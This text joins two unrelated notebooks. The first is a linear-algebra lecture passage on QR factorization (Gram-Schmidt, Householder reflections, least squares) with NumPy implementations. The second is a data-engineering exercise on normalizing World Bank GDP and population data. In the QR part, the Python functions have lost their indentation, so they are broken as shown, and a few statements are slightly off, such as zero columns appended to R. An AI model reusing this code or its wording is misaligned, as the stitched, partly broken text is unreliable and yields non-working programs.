# As the above may have suggested, we can directly construct the arrays $Q$ and $R$ via a process of successive orthogonalization. We have already shown the first two iterations so let's now consider the $j$th iteration.
# + [markdown] slideshow={"slide_type": "subslide"}
# We want to subtract off the components of the vector $a_j$ in the direction of the $q_i$ vectors where $i=1,\ldots,j-1$. This suggests that we define a vector $v_j$ such that
# $$\begin{aligned}
# v_j &= a_j - \langle q_1, a_j \rangle q_1 - \langle q_2, a_j \rangle q_2 - \quad \cdots \quad - \langle q_{j-1}, a_j \rangle q_{j-1} \\
# &= a_j - \sum^{j-1}_{i=1} \langle q_i, a_j \rangle q_i.
# \end{aligned}$$
#
# We also need to normalize $v_j$, which allows us to define the $j$th column of $Q$ as
# $$
# q_j = \frac{a_j - \sum^{j-1}_{i=1} \langle q_i, a_j \rangle q_i}{\left \Vert a_j - \sum^{j-1}_{i=1} \langle q_i, a_j \rangle q_i \right \Vert}.
# $$
# + [markdown] slideshow={"slide_type": "subslide"}
# We can also discern what the entries of $R$ are as we can write the matrix multiplication as the sequence
# $$\begin{aligned}
# q_1 &= \frac{a_1}{r_{11}} \\
# q_2 &= \frac{a_2 - r_{12} q_1}{r_{22}} \\
# q_3 &= \frac{a_3 - r_{13} q_1 - r_{23} q_2}{r_{33}} \\
# &\vdots \\
# q_n &= \frac{a_n - \sum^{n-1}_{i=1} r_{in} q_i}{r_{nn}}
# \end{aligned}$$
# leading us to define
# $$
# r_{ij} = \left \{ \begin{aligned}
# &\langle q_i, a_j \rangle & &i \neq j \\
# &\left \Vert a_j - \sum^{j-1}_{i=1} r_{ij} q_i \right \Vert & &i = j
# \end{aligned} \right .
# $$
#
# This is called the **classical Gram-Schmidt** iteration. It turns out that the procedure above is numerically unstable because of the rounding errors introduced.
# + slideshow={"slide_type": "skip"}
# Implement Classical Gram-Schmidt Iteration
def classic_GS(A):
m = A.shape[0]
n = A.shape[1]
Q = numpy.empty((m, n))
R = numpy.zeros((n, n))
for j in range(n):
v = A[:, j]
for i in range(j):
R[i, j] = numpy.dot(Q[:, i].conjugate(), A[:, j])
v = v - R[i, j] * Q[:, i]
R[j, j] = numpy.linalg.norm(v, ord=2)
Q[:, j] = v / R[j, j]
return Q, R
A = numpy.array([[12, -51, 4], [6, 167, -68], [-4, 24, -41]], dtype=float)
Q, R = classic_GS(A)
print(A)
print(Q)
print(numpy.dot(Q.transpose(), Q))
print(R)
print(numpy.dot(Q, R) - A)
# + [markdown] slideshow={"slide_type": "subslide"}
# #### Full vs. Reduced QR
#
# If the original matrix $A \in \mathbb C^{m \times n}$ where $m \ge n$ then we can still define a QR factorization, called the **full QR factorization**, which appends columns full of zeros to $R$ to reproduce the full matrix.
# $$
# A = Q R = \begin{bmatrix} Q_1 & Q_2 \end{bmatrix}
# \begin{bmatrix} R_1 \\
# 0
# \end{bmatrix} = Q_1 R_1
# $$
# The factorization $Q_1 R_1$ is called the **reduced** or **thin QR factorization** of $A$.
#
# We require that the additional columns added $Q_2$ are an orthonormal basis that is orthogonal itself to $\text{range}(A)$. If $A$ is full ranked then $Q_1$ and $Q_2$ provide a basis for $\text{range}(A)$ and $\text{null}(A^\ast)$ respectively.
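# NumPy exposes both forms through the `mode` argument of `numpy.linalg.qr` (a quick check of the shapes; the matrix here is a random example):

```python
import numpy

A = numpy.random.random((5, 3))   # m = 5 > n = 3

Q1, R1 = numpy.linalg.qr(A, mode='reduced')    # thin: 5x3 and 3x3
Q, R = numpy.linalg.qr(A, mode='complete')     # full: 5x5 and 5x3

print(Q1.shape, R1.shape)                      # (5, 3) (3, 3)
print(Q.shape, R.shape)                        # (5, 5) (5, 3)
print(numpy.allclose(numpy.dot(Q, R), A))      # True
print(numpy.allclose(R[3:, :], 0.0))           # appended rows of R are zero
```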
# + [markdown] slideshow={"slide_type": "subslide"}
# #### QR Existence and Uniqueness
# Two important theorems exist regarding this algorithm which we state without proof:
#
# *Every $A \in \mathbb C^{m \times n}$ with $m \geq n$ has a full QR factorization and therefore a reduced QR factorization.*
#
# *Each $A \in \mathbb C^{m \times n}$ with $m \geq n$ of full rank has a unique reduced QR factorization $A = QR$ with $r_{jj} > 0$.*
# + [markdown] slideshow={"slide_type": "subslide"}
# #### Gram-Schmidt in Terms of Projections
#
# To start, let's rewrite classical Gram-Schmidt as a series of projections:
# $$
# q_1 = \frac{P_1 a_1}{||P_1 a_1||}, \quad q_2 = \frac{P_2 a_2}{||P_2 a_2||}, \quad \cdots \quad q_n = \frac{P_n a_n}{||P_n a_n||}
# $$
# where the $P_i$ are orthogonal projectors onto the space orthogonal to $q_1, q_2, \ldots, q_{i-1}$, in other words onto the complement of $\text{span}(a_1, a_2, \ldots, a_{i-1})$.
#
# How should we construct these projectors?
# + [markdown] slideshow={"slide_type": "subslide"}
# We saw before that we can easily construct an orthogonal projector onto the complement of a space by first constructing the projector onto the space itself via
# $$
# \hat{\!Q}_{i-1} = \begin{bmatrix}
# & & & \\
# & & & \\
# q_1 & q_2 & \cdots & q_{i-1} \\
# & & & \\
# & & &
# \end{bmatrix}.
# $$
# Constructing the projection onto the space spanned by $q_1$ through $q_{i-1}$ is then
# $$
# \hat{\!P}_{i-1} = \hat{\!Q}_{i-1} \hat{\!Q}^\ast_{i-1}
# $$
# and therefore the projections in Gram-Schmidt orthogonalization is
# $$
# P_{i} = I - \hat{\!P}_{i-1} = I - \hat{\!Q}_{i-1} \hat{\!Q}^\ast_{i-1}.
# $$
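# A numerical sketch of these projectors, using a random $\hat{Q}$ with orthonormal columns (obtained here from NumPy's own QR routine for convenience):

```python
import numpy

Q_hat, _ = numpy.linalg.qr(numpy.random.random((4, 2)))  # orthonormal columns

P_hat = numpy.dot(Q_hat, Q_hat.conjugate().T)  # projects onto span(q_1, q_2)
P = numpy.eye(4) - P_hat                       # projects onto the complement

x = numpy.random.random(4)
# P x has no component along any q_i
print(numpy.allclose(numpy.dot(Q_hat.T, numpy.dot(P, x)), 0.0))  # True
print(numpy.allclose(numpy.dot(P, P), P))                        # idempotent
```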
# + [markdown] slideshow={"slide_type": "subslide"}
# #### Modified Gram-Schmidt
#
# One problem with the original Gram-Schmidt algorithm is it is not stable numerically. Instead we can derive a modified method that is more numerically stable.
# + [markdown] slideshow={"slide_type": "subslide"}
# Recall that the basic piece of the original algorithm was to take the inner product of $a_j$ and all the relevant $q_i$. Using the rewritten version of Gram-Schmidt in terms of projections we then have
#
# $$
# v_i = P_i a_i.
# $$
# + [markdown] slideshow={"slide_type": "subslide"}
# This projection is of rank $m - (i - 1)$ as we know that the resulting $v_i$ are linearly independent by construction. The modified version of Gram-Schmidt instead uses projections that are all of rank $m-1$. To construct this projection remember that we can again construct the complement to a projection and perform the following sequence of projections
#
# $$
# P_i = \hat{\!P}_{q_{i-1}} \hat{\!P}_{q_{i-2}} \cdots \hat{\!P}_{q_{2}} \hat{\!P}_{q_{1}}
# $$
#
# where $\hat{\!P}_{q_{i}}$ projects onto the complement of the space spanned by $q_i$. Note that this performs mathematically the same job as $P_i a_i$ however each of these projectors are of rank $m - 1$.
# + [markdown] slideshow={"slide_type": "subslide"}
# This leads to the following set of calculations:
#
# $$\begin{aligned}
# 1.\quad v^{(1)}_i &= a_i \\
# 2.\quad v^{(2)}_i &= \hat{\!P}_{q_1} v_i^{(1)} = v^{(1)}_i - q_1 q_1^\ast v^{(1)}_i \\
# 3.\quad v^{(3)}_i &= \hat{\!P}_{q_2} v_i^{(2)} = v^{(2)}_i - q_2 q_2^\ast v^{(2)}_i \\
# & \text{ } \vdots & &\\
# i.\quad v^{(i)}_i &= \hat{\!P}_{q_{i-1}} v_i^{(i-1)} = v_i^{(i-1)} - q_{i-1} q_{i-1}^\ast v^{(i-1)}_i
# \end{aligned}$$
#
# The reason why this approach is more stable is that we are not projecting with a possibly arbitrarily low-rank projector; instead we only take projectors that are high-rank.
# + [markdown] slideshow={"slide_type": "subslide"}
# **Example: Implementation of modified Gram-Schmidt**
# Implement the modified Gram-Schmidt algorithm checking to make sure the resulting factorization has the required properties.
# + slideshow={"slide_type": "skip"}
# Implement Modified Gram-Schmidt Iteration
def mod_GS(A):
m = A.shape[0]
n = A.shape[1]
Q = numpy.empty((m, n))
R = numpy.zeros((n, n))
v = A.copy()
for i in range(n):
R[i, i] = numpy.linalg.norm(v[:, i], ord=2)
Q[:, i] = v[:, i] / R[i, i]
for j in range(i + 1, n):
R[i, j] = numpy.dot(Q[:, i].conjugate(), v[:, j])
v[:, j] -= R[i, j] * Q[:, i]
return Q, R
A = numpy.array([[12, -51, 4], [6, 167, -68], [-4, 24, -41]], dtype=float)
print(A)
Q, R = mod_GS(A)
print(R)
print(numpy.dot(Q.transpose(), Q))
print("Modified = ")
print(numpy.dot(Q, R) - A)
# + [markdown] slideshow={"slide_type": "subslide"}
# ### Householder Triangularization
#
# One way to also interpret Gram-Schmidt orthogonalization is as a series of multiplications by upper triangular matrices of the matrix A. For instance the first step in performing the modified algorithm is to divide through by the norm $r_{11} = ||v_1||$ to give $q_1$:
#
# $$
# \begin{bmatrix}
# & & & \\
# & & & \\
# v_1 & v_2 & v_3 & \cdots & v_n \\
# & & & \\
# & & &
# \end{bmatrix}
# \begin{bmatrix}
# \frac{1}{r_{11}} & &\cdots & \\
# & 1 & \\
# & & \ddots & \\
# & & & 1
# \end{bmatrix} =
# \begin{bmatrix}
# & & & \\
# & & & \\
# q_1 & v_2 & v_3 & \cdots & v_n \\
# & & & \\
# & & &
# \end{bmatrix}
# $$
# + [markdown] slideshow={"slide_type": "subslide"}
# We can also perform all the step (2) evaluations, combining them with the step that projects onto the complement of $q_1$, by adding the appropriate values to the entire first row:
#
# $$
# \begin{bmatrix}
# & & & \\
# & & & \\
# v_1 & v_2 & v_3 & \cdots & v_n \\
# & & & \\
# & & &
# \end{bmatrix}
# \begin{bmatrix}
# \frac{1}{r_{11}} & -\frac{r_{12}}{r_{11}} & -\frac{r_{13}}{r_{11}} & \cdots \\
# & 1 & \\
# & & \ddots & \\
# & & & 1
# \end{bmatrix} =
# \begin{bmatrix}
# & & & \\
# & & & \\
# q_1 & v_2^{(2)} & v_3^{(2)} & \cdots & v_n^{(2)} \\
# & & & \\
# & & &
# \end{bmatrix}
# $$
# + [markdown] slideshow={"slide_type": "subslide"}
# The next step can then be placed into the second row:
# $$
# \begin{bmatrix}
# & & & \\
# & & & \\
# v_1 & v_2 & v_3 & \cdots & v_n \\
# & & & \\
# & & &
# \end{bmatrix}
# \cdot R_1 \cdot
# \begin{bmatrix}
# 1 & & & & \\
# & \frac{1}{r_{22}} & -\frac{r_{23}}{r_{22}} & -\frac{r_{24}}{r_{22}} & \cdots \\
# & & 1 & \\
# & & & \ddots & \\
# & & & & 1
# \end{bmatrix} =
# \begin{bmatrix}
# & & & \\
# & & & \\
# q_1 & q_2 & v_3^{(3)} & \cdots & v_n^{(3)} \\
# & & & \\
# & & &
# \end{bmatrix}
# $$
# + [markdown] slideshow={"slide_type": "subslide"}
# If we identify the matrices as $R_1$ for the first case, $R_2$ for the second case and so on we can write the algorithm as
#
# $$
# A \underbrace{R_1R_2 \quad \cdots \quad R_n}_{\hat{R}^{-1}} = \hat{\!Q}.
# $$
#
# This view of Gram-Schmidt is called *triangular orthogonalization*: we multiply $A$ by triangular matrices to produce an orthogonal one.
# + [markdown] slideshow={"slide_type": "subslide"}
# Householder triangularization is similar in spirit. Instead of multiplying $A$ on the right, Householder multiplies $A$ on the left by unitary matrices $Q_k$. Remember that a unitary matrix (or an orthogonal matrix when strictly real) has as its inverse its adjoint (transpose when real), $Q^\ast = Q^{-1}$, so that $Q^\ast Q = I$. We therefore have
#
# $$
# Q_n Q_{n-1} \quad \cdots \quad Q_2 Q_1 A = R
# $$
#
# which, if we identify $Q_n Q_{n-1} \text{ } \cdots \text{ } Q_2 Q_1 = Q^\ast$, gives $Q = Q^\ast_1 Q^\ast_2 \text{ } \cdots \text{ } Q^\ast_{n-1} Q^\ast_n$, which is also unitary.
# + [markdown] slideshow={"slide_type": "subslide"}
# We can then write this as
# $$\begin{aligned}
# Q_n Q_{n-1} \text{ } \cdots \text{ } Q_2 Q_1 A &= R \\
# Q_{n-1} \cdots Q_2 Q_1 A &= Q^\ast_n R \\
# & \text{ } \vdots \\
# A &= Q^\ast_1 Q^\ast_2 \text{ } \cdots \text{ } Q^\ast_{n-1} Q^\ast_n R \\
# A &= Q R
# \end{aligned}$$
# + [markdown] slideshow={"slide_type": "subslide"}
# This way we can think of Householder triangularization as introducing zeros into $A$ via orthogonal matrices.
#
# $$
# \begin{bmatrix}
# \text{x} & \text{x} & \text{x} \\
# \text{x} & \text{x} & \text{x} \\
# \text{x} & \text{x} & \text{x} \\
# \text{x} & \text{x} & \text{x} \\
# \end{bmatrix} \overset{Q_1}{\rightarrow}
# \begin{bmatrix}
# \text{x} & \text{x} & \text{x} \\
# 0 & \text{x} & \text{x} \\
# 0 & \text{x} & \text{x} \\
# 0 & \text{x} & \text{x} \\
# \end{bmatrix} \overset{Q_2}{\rightarrow}
# \begin{bmatrix}
# \text{x} & \text{x} & \text{x} \\
# 0 & \text{x} & \text{x} \\
# 0 & 0 & \text{x} \\
# 0 & 0 & \text{x} \\
# \end{bmatrix} \overset{Q_3}{\rightarrow}
# \begin{bmatrix}
# \text{x} & \text{x} & \text{x} \\
# 0 & \text{x} & \text{x} \\
# 0 & 0 & \text{x} \\
# 0 & 0 & 0\\
# \end{bmatrix}
# $$
# + [markdown] slideshow={"slide_type": "subslide"}
# Now the question is how do we construct the $Q_k$. The construction is usually broken down into a matrix of the form
#
# $$
# Q_k = \begin{bmatrix} I & 0 \\ 0 & F \end{bmatrix}
# $$
#
# where $I \in \mathbb C^{(k-1) \times (k-1)}$ is the identity matrix and $F \in \mathbb C^{(m - k + 1) \times (m - k + 1)}$ is a unitary matrix. Note that this will leave the rows and columns we have already worked on alone while remaining unitary.
# + [markdown] slideshow={"slide_type": "subslide"}
# To construct $F$ consider the transformation that reflects the vector $x$ over the plane $H$ so that $F x = ||x|| e_1$:
# 
# or mathematically
# $$
# x = \begin{bmatrix}
# \text{x} \\
# \text{x} \\
# \text{x} \\
# \text{x}
# \end{bmatrix} \overset{F}{\rightarrow}
# Fx = \begin{bmatrix}
# ||x|| \\
# 0 \\
# 0 \\
# 0
# \end{bmatrix} = ||x|| e_1.
# $$
# + [markdown] slideshow={"slide_type": "subslide"}
# This is of course the effect on only one vector. Any other vector will be reflected across $H$ (technically a hyperplane) which is orthogonal to $v = ||x|| e_1 - x$. This has a construction similar to the projector complements we were working with before. Consider the projector defined as
#
# $$
# P x = \left (I - \frac{v v^\ast}{v^\ast v}\right) x = x - v \left(\frac{v^\ast x}{v^\ast v} \right),
# $$
#
# the complement of a projection in the direction of the vector $v$, in other words in the direction of $H$ above. Since we actually want to transform $x$ to lie in the direction of $e_1$ we need to go twice as far as just the projection onto $H$. This allows us to identify the matrix $F$ as
#
# $$
# F = I - 2 \frac{v v^\ast}{v^\ast v}.
# $$
# + [markdown] slideshow={"slide_type": "subslide"}
# There is actually a non-uniqueness in which direction we reflect over, since another hyperplane $\hat{H}$, orthogonal to the one we originally chose, is also available. For numerical stability purposes we will choose the reflector that is the most different from $x$. This avoids the numerical difficulties that arise when the vector $x$ is nearly aligned with $e_1$, and therefore nearly parallel to one of the choices of $H$. By convention the $v$ chosen is defined by
#
# $$
# v = \text{sign}(x_1)||x|| e_1 + x.
# $$
# + slideshow={"slide_type": "skip"}
# Implementation of Householder QR Factorization
def householder_QR(A, verbose=False):
R = A.copy()
v = numpy.empty(A.shape)
m, n = A.shape
for k in range(n):
x = R[k:, k]
e1 = numpy.zeros(x.shape)
e1[0] = 1.0
v[k:, k] = numpy.sign(x[0]) * numpy.linalg.norm(x, ord=2) * e1 + x
v[k:, k] = v[k:, k] / numpy.linalg.norm(v[k:, k], ord=2)
R[k:, k:] -= 2.0 * numpy.dot(numpy.outer(v[k:, k], v[k:, k]), R[k:, k:])
# Form Q
m, n = A.shape
Q = numpy.zeros(A.shape)
for i in range(n):
en = numpy.zeros(m)
en[i] = 1.0
for j in range(n - 1, -1, -1):
en[j:m] -= 2.0 * numpy.dot(numpy.outer(v[j:, j], v[j:, j]), en[j:m])
Q[:, i] = en
return Q, R
A = numpy.array([[12, -51, 4], [6, 167, -68], [-4, 24, -41]], dtype=float)
print("Matrix A = ")
print(A)
m, n = A.shape
Q, R = householder_QR(A, verbose=False)
print("Householder (reduced) Q = ")
print(Q)
print("Householder (full) R = ")
print(R)
print("Check to see if factorization worked...")
print(numpy.abs(A - numpy.dot(Q, R[:n, :n])))
# + [markdown] slideshow={"slide_type": "subslide"}
# In the above algorithm we do not need to explicitly form the matrix $Q$, which saves memory and computation. If we wanted, for instance, to solve $A x = b$ we again have
#
# $$\begin{aligned}
# A x &= b \\
# Q R x &= b \\
# Rx &= Q^\ast b.
# \end{aligned}$$
#
# This requires then the multiplication $Q^\ast b$. To do this we just need to recognize that the vectors $v$ we save specify the $Q_k$ so we can form the matrices $F$ and multiply the vector directly with the $v_k$s:
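# A sketch of that idea (self-contained for illustration: `householder_vectors` stores the normalized $v$'s much as the implementation above does, and `apply_Qstar` applies the reflections $Q_n \cdots Q_1$ to $b$ without ever forming $Q$):

```python
import numpy

def householder_vectors(A):
    """Householder QR keeping only R and the unit reflection vectors v."""
    R = A.astype(float).copy()
    m, n = A.shape
    v = numpy.zeros((m, n))
    for k in range(n):
        x = R[k:, k]
        vk = x.copy()
        vk[0] += numpy.sign(x[0]) * numpy.linalg.norm(x, ord=2)
        vk /= numpy.linalg.norm(vk, ord=2)
        v[k:, k] = vk
        R[k:, k:] -= 2.0 * numpy.outer(vk, numpy.dot(vk, R[k:, k:]))
    return v, R

def apply_Qstar(v, b):
    """Compute Q^* b = Q_n ... Q_1 b from the stored v's, never forming Q."""
    b = b.astype(float).copy()
    for k in range(v.shape[1]):
        b[k:] -= 2.0 * numpy.dot(v[k:, k], b[k:]) * v[k:, k]
    return b

A = numpy.array([[12., -51., 4.], [6., 167., -68.], [-4., 24., -41.]])
b = numpy.array([1.0, 2.0, 3.0])
v, R = householder_vectors(A)
x = numpy.linalg.solve(R, apply_Qstar(v, b))   # solve R x = Q^* b
print(numpy.allclose(numpy.dot(A, x), b))      # True
```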
# + [markdown] slideshow={"slide_type": "subslide"}
# #### Example 1: Random Matrix QR
#
# Consider a matrix $A$ built from random orthogonal factors and widely varying singular values. The values along the diagonal of $R$ give us some idea of the size of the projections as we go, i.e. the larger the values the less effective we are in constructing orthogonal directions.
# + slideshow={"slide_type": "skip"}
N = 80
U, X = numpy.linalg.qr(numpy.random.random((N, N)))
V, X = numpy.linalg.qr(numpy.random.random((N, N)))
S = numpy.diag(2.0**numpy.arange(-1.0, -(N + 1), -1.0))
A = numpy.dot(U, numpy.dot(S, V))
fig = plt.figure()
axes = fig.add_subplot(1, 1, 1)
Q, R = classic_GS(A)
axes.semilogy(numpy.diag(R), 'bo', label="Classic")
Q, R = mod_GS(A)
axes.semilogy(numpy.diag(R), 'ro', label="Modified")
Q, R = householder_QR(A)
axes.semilogy(numpy.diag(R), 'ko', label="Householder")
axes.set_xlabel("Index")
axes.set_ylabel("$R_{ii}$")
axes.legend(loc=3)
axes.plot(numpy.arange(0, N), numpy.ones(N) * numpy.sqrt(numpy.finfo(float).eps), 'k--')
axes.plot(numpy.arange(0, N), numpy.ones(N) * numpy.finfo(float).eps, 'k--')
plt.show()
# + [markdown] slideshow={"slide_type": "subslide"}
# #### Example 2: Comparing Orthogonality
#
# Consider
# $$
# A = \begin{bmatrix}
# 0.70000 & 0.70711 \\ 0.70001 & 0.70711
# \end{bmatrix}.
# $$
# Check that the matrix $Q$ is really unitary given this matrix.
# + slideshow={"slide_type": "skip"}
# %precision 16
A = numpy.array([[0.7, 0.70711], [0.70001, 0.70711]])
Q, R = classic_GS(A)
print("Classic: ", numpy.linalg.norm(numpy.dot(Q.transpose(), Q) - numpy.eye(2)))
Q, R = mod_GS(A)
print("Modified: ", numpy.linalg.norm(numpy.dot(Q.transpose(), Q) - numpy.eye(2)))
Q, R = householder_QR(A)
print("Householder:", numpy.linalg.norm(numpy.dot(Q.transpose(), Q) - numpy.eye(2)))
Q, R = numpy.linalg.qr(A)
print("Numpy: ", numpy.linalg.norm(numpy.dot(Q.transpose(), Q) - numpy.eye(2)))
# + [markdown] slideshow={"slide_type": "subslide"}
# ### Applications of QR
#
# #### Solving $Ax = b$ with QR
#
# Suppose we want to solve the system $Ax = b$ where $A \in \mathbb C^{m \times m}$. See if you can figure out how to use a QR factorization to help with this.
# + [markdown] slideshow={"slide_type": "subslide"}
# Say we have found the QR factorization of $A$, then
# $$\begin{aligned}
# A x &= b \\
# QR x & = b \\
# Q^\ast Q R x &= Q^\ast b \\
# R x &= Q^\ast b.
# \end{aligned}$$
# Given that $R$ is upper triangular we can use back-substitution to find $x$.
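# A sketch of this approach, using NumPy's QR for the factorization and a hand-written back-substitution (the matrix and right-hand side are hypothetical examples):

```python
import numpy

def back_substitute(R, y):
    """Solve the upper-triangular system R x = y by back-substitution."""
    n = y.shape[0]
    x = numpy.zeros(n)
    for i in range(n - 1, -1, -1):
        x[i] = (y[i] - numpy.dot(R[i, i+1:], x[i+1:])) / R[i, i]
    return x

A = numpy.array([[12., -51., 4.], [6., 167., -68.], [-4., 24., -41.]])
b = numpy.array([1.0, 2.0, 3.0])
Q, R = numpy.linalg.qr(A)
x = back_substitute(R, numpy.dot(Q.T, b))   # R x = Q^* b
print(numpy.allclose(numpy.dot(A, x), b))   # True
```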
# + [markdown] slideshow={"slide_type": "subslide"}
# #### Applications: Least Squares Problems
#
# Least squares problems have already been introduced but let's consider how our QR factorizations might help us. As before, the least squares problem is characterized by wanting to find the $x$ such that $||b - Ax||_2$ is minimized over $x \in \mathbb C^n$.
# + [markdown] slideshow={"slide_type": "subslide"}
# Since we are using the $\ell_2$ norm and know this is equivalent to the Euclidean norm we know that there is a geometric interpretation to this goal, find the vector $x$ that gives the minimum distance between the vector $b$ and $A x$. This can be interpreted as a projection:
# 
# where
# $$
# r = b - Ax
# $$
# and
# $$
# y = Ax = Pb.
# $$
# The vector $r$ is called the residual (and the thing we are trying to minimize). $P$ represents the orthogonal projector onto the $\text{range}(A)$.
# + [markdown] slideshow={"slide_type": "subslide"}
# QR factorization plays a role similar to the ideas we saw from Householder triangularization. Define the orthogonal projector $P = Q Q^\ast$ based on the reduced QR factorization of $A$. We know then that the projector projects onto the column space of $A$, i.e. $\text{range}(A)$. Using this QR factorization, the least-squares formulation (starting from the normal equations) then becomes
# $$\begin{aligned}
# A^\ast A x &= A^\ast b \\
# R^\ast Q^\ast Q R x &= R^\ast Q^\ast b \\
# R^\ast R x & = R^\ast Q^\ast b \\
# R x & = Q^\ast b
# \end{aligned}$$
# reducing the least-squares calculation to one of finding the QR factorization and backwards substitution.
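A hedged sketch of this least-squares recipe, checked against `numpy.linalg.lstsq` (the helper name is illustrative):

```python
import numpy as np

def qr_lstsq(A, b):
    """Least-squares solution of A x ~ b via the reduced QR factorization."""
    Q, R = np.linalg.qr(A)             # Q: (m, n), R: (n, n) upper triangular
    return np.linalg.solve(R, Q.T @ b)  # R x = Q^T b; R is triangular

rng = np.random.default_rng(1)
A = rng.standard_normal((20, 4))
b = rng.standard_normal(20)

x_qr = qr_lstsq(A, b)
x_np, *_ = np.linalg.lstsq(A, b, rcond=None)
print(np.allclose(x_qr, x_np))  # True
```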
|
11_LA_QR.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# # Scaling Data
#
# In this exercise, you'll practice scaling data. Sometimes, you'll see the terms **standardization** and **normalization** used interchangeably when referring to feature scaling. However, these are slightly different operations. Standardization refers to scaling a set of values so that they have a mean of zero and a standard deviation of one. Normalization refers to scaling a set of values so that the range is between zero and one.
#
# In this exercise, you'll practice implementing standardization and normalization in code. There are libraries, like scikit-learn, that can do this for you; however, in data engineering, you might not always have these tools available.
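As a quick illustration of the distinction (this sketch uses `numpy` directly; the exercises below build the scaling by hand):

```python
import numpy as np

x = np.array([3.0, 7.0, 11.0, 15.0, 19.0])

standardized = (x - x.mean()) / x.std()           # mean 0, standard deviation 1
normalized = (x - x.min()) / (x.max() - x.min())  # values between 0 and 1

print(standardized.mean(), standardized.std())
print(normalized.min(), normalized.max())
```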
#
# Run this first cell to read in the World Bank GDP and population data. This code cell also filters the data for 2016 and filters out the aggregated values like 'World' and 'OECD Members'.
# +
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
# %matplotlib inline
# read in the projects data set and do basic wrangling
gdp = pd.read_csv('../data/gdp_data.csv', skiprows=4)
gdp.drop(['Unnamed: 62', 'Country Code', 'Indicator Name', 'Indicator Code'], inplace=True, axis=1)
population = pd.read_csv('../data/population_data.csv', skiprows=4)
population.drop(['Unnamed: 62', 'Country Code', 'Indicator Name', 'Indicator Code'], inplace=True, axis=1)
# Reshape the data sets so that they are in long format
gdp_melt = gdp.melt(id_vars=['Country Name'],
var_name='year',
value_name='gdp')
# Use back fill and forward fill to fill in missing gdp values
gdp_melt['gdp'] = gdp_melt.sort_values('year').groupby('Country Name')['gdp'].fillna(method='ffill').fillna(method='bfill')
population_melt = population.melt(id_vars=['Country Name'],
var_name='year',
value_name='population')
# Use back fill and forward fill to fill in missing population values
population_melt['population'] = population_melt.sort_values('year').groupby('Country Name')['population'].fillna(method='ffill').fillna(method='bfill')
# merge the population and gdp data together into one data frame
df_country = gdp_melt.merge(population_melt, on=('Country Name', 'year'))
# filter data for the year 2016
df_2016 = df_country[df_country['year'] == '2016']
# filter out values that are not countries
non_countries = ['World',
'High income',
'OECD members',
'Post-demographic dividend',
'IDA & IBRD total',
'Low & middle income',
'Middle income',
'IBRD only',
'East Asia & Pacific',
'Europe & Central Asia',
'North America',
'Upper middle income',
'Late-demographic dividend',
'European Union',
'East Asia & Pacific (excluding high income)',
'East Asia & Pacific (IDA & IBRD countries)',
'Euro area',
'Early-demographic dividend',
'Lower middle income',
'Latin America & Caribbean',
'Latin America & the Caribbean (IDA & IBRD countries)',
'Latin America & Caribbean (excluding high income)',
'Europe & Central Asia (IDA & IBRD countries)',
'Middle East & North Africa',
'Europe & Central Asia (excluding high income)',
'South Asia (IDA & IBRD)',
'South Asia',
'Arab World',
'IDA total',
'Sub-Saharan Africa',
'Sub-Saharan Africa (IDA & IBRD countries)',
'Sub-Saharan Africa (excluding high income)',
'Middle East & North Africa (excluding high income)',
'Middle East & North Africa (IDA & IBRD countries)',
'Central Europe and the Baltics',
'Pre-demographic dividend',
'IDA only',
'Least developed countries: UN classification',
'IDA blend',
'Fragile and conflict affected situations',
'Heavily indebted poor countries (HIPC)',
'Low income',
'Small states',
'Other small states',
'Not classified',
'Caribbean small states',
'Pacific island small states']
# remove non countries from the data
df_2016 = df_2016[~df_2016['Country Name'].isin(non_countries)]
# show the first ten rows
print('first ten rows of data')
df_2016.head(10)
# -
# # Exercise - Normalize the Data
#
# To normalize data, you take a feature, like gdp, and use the following formula
#
# $x_{normalized} = \frac{x - x_{min}}{x_{max} - x_{min}}$
#
# where
# * x is a value of gdp
# * x_max is the maximum gdp in the data
# * x_min is the minimum GDP in the data
#
# First, write a function that outputs the x_min and x_max values of an array. The inputs are an array of data (like the GDP data). The outputs are the x_min and x_max values
# +
def x_min_max(data):
# TODO: Complete this function called x_min_max()
# The input is an array of data as an input
# The outputs are the minimum and maximum of that array
minimum = data.min()
    maximum = data.max()
return minimum, maximum
# this should give the result (36572611.88531479, 18624475000000.0)
x_min_max(df_2016['gdp'])
# -
# Next, write a function that normalizes a data point. The inputs are an x value, a minimum value, and a maximum value. The output is the normalized data point
def normalize(x, x_min, x_max):
# TODO: Complete this function
# The input is a single value
# The output is the normalized value
return (x-x_min)/(x_max-x_min)
# Why are you making these separate functions? Let's say you are training a machine learning model and using normalized GDP as a feature. As new data comes in, you'll want to make predictions using the new GDP data. You'll have to normalize this incoming data. To do that, you need to store the x_min and x_max from the training set. Hence the x_min_max() function gives you the minimum and maximum values, which you can then store in a variable.
#
# A good way to keep track of the minimum and maximum values would be to use a class. In this next section, fill out the Normalizer() class code to make a class that normalizes a data set and stores min and max values.
class Normalizer():
# TODO: Complete the normalizer class
# The normalizer class receives a dataframe as its only input for initialization
# For example, the data frame might contain gdp and population data in two separate columns
# Follow the TODOs in each section
def __init__(self, dataframe):
# TODO: complete the init function.
# Assume the dataframe has an unknown number of columns like [['gdp', 'population']]
# iterate through each column calculating the min and max for each column
# append the results to the params attribute list
# For example, take the gdp column and calculate the minimum and maximum
# Put these results in a list [minimum, maximum]
# Append the list to the params variable
# Then take the population column and do the same
# HINT: You can put your x_min_max() function as part of this class and use it
# HINT: Use a for loop to iterate through the columns of the dataframe
self.params = []
for col in dataframe.columns:
self.params.append(x_min_max(dataframe[col]))
    def x_min_max(self, data):
        # TODO: complete the x_min_max method
        # HINT: You can use the same function defined earlier in the exercise
        minimum = min(data)
        maximum = max(data)
        return minimum, maximum
def normalize_data(self, x):
# TODO: complete the normalize_data method
# The function receives a data point as an input and then outputs the normalized version
# For example, if an input data point of [gdp, population] were used. Then the output would
# be the normalized version of the [gdp, population] data point
# Put the results in the normalized variable defined below
# Assume that the columns in the dataframe used to initialize an object are in the same
# order as this data point x
# HINT: You cannot use the normalize_data function defined earlier in the exercise.
# You'll need to iterate through the individual values in the x variable. A for loop and the
# Python enumerate method might be useful.
# Use the params attribute where the min and max values are stored
normalized = []
for i,value in enumerate(x):
x_min = self.params[i][0]
x_max = self.params[i][1]
normalized.append((x[i]-x_min)/(x_max-x_min))
return normalized
# Run the code cells below to check your results
gdp_normalizer = Normalizer(df_2016[['gdp', 'population']])
